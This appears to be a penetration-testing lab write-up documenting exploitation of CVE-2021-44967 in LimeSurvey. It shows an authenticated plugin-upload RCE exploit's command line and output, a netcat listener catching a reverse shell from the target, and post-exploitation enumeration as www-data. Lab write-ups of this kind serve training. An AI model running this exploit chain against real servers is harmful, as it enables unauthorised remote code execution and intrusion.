CVE-2021-44967
The target LimeSurvey instance has been suspected to be vulnerable to CVE-2021-44967 Modifications have been made to fit the current engagement context.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/marketing/Limesurvey-RCE]
└─$ python3 exploit.py http://customers-survey.marketing.pg admin password 80
_______________LimeSurvey RCE_______________
Usage: python exploit.py URL username password port
Example: python exploit.py http://192.26.26.128 admin password 80
== ██╗ ██╗ ██╗██╗ ██████╗ ██╗██████╗ ██╗███╗ ███╗ ==
== ╚██╗ ██╔╝███║██║ ██╔══██╗███║██╔══██╗███║████╗ ████║ ==
== ╚████╔╝ ╚██║██║ ██║ ██║╚██║██████╔╝╚██║██╔████╔██║ ==
== ╚██╔╝ ██║██║ ██║ ██║ ██║██╔══██╗ ██║██║╚██╔╝██║ ==
== ██║ ██║███████╗██████╔╝ ██║██║ ██║ ██║██║ ╚═╝ ██║ ==
== ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ==
[+] Retrieving CSRF token...
CSRF_token = s.findAll('input')[0].get("value")
UDBZbTU0T1Z-YUpaSWxjbFRHSzMwVmFQclliYl94aXa_RTQbQC1WsrZVZh5N-zieCI2vY23Dk486kglIVU7qug==
[+] Sending Login Request...
[+]Login Successful
[+] Upload Plugin Request...
[+] Retrieving CSRF token...
CSRF_token2 = s.findAll('input')[0].get("value")
WjdsYjF-dDI4QWlpQ25uUHNKNWZORXlaa2NMX2kzVkKw3wr-qZ-MdRuwinSIOhsjpXNIt0ucZjaoi7J0zonOLQ==
[+] Plugin Uploaded Successfully
[+] Install Plugin Request...
[+] Retrieving CSRF token...
CSRF_token3 = s.findAll('input')[0].get("value")
WjdsYjF-dDI4QWlpQ25uUHNKNWZORXlaa2NMX2kzVkKw3wr-qZ-MdRuwinSIOhsjpXNIt0ucZjaoi7J0zonOLQ==
[+] Plugin Installed Successfully
[+] Activate Plugin Request...
[+] Retrieving CSRF token...
CSRF_token4 = s.findAll('input')[0].get("value")
WjdsYjF-dDI4QWlpQ25uUHNKNWZORXlaa2NMX2kzVkKw3wr-qZ-MdRuwinSIOhsjpXNIt0ucZjaoi7J0zonOLQ==
[+] Plugin Activated Successfully
[+] Reverse Shell Starting, Check Your Connection :)Executing the exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/marketing/Limesurvey-RCE]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.211.225] 34552
Linux marketing 5.4.0-122-generic #138-Ubuntu SMP Wed Jun 22 15:00:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
15:11:21 up 45 min, 0 users, load average: 0.00, 0.00, 0.06
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
marketing
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:73:ea brd ff:ff:ff:ff:ff:ff
inet 192.168.211.225/24 brd 192.168.211.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via exploiting CVE-2021-44967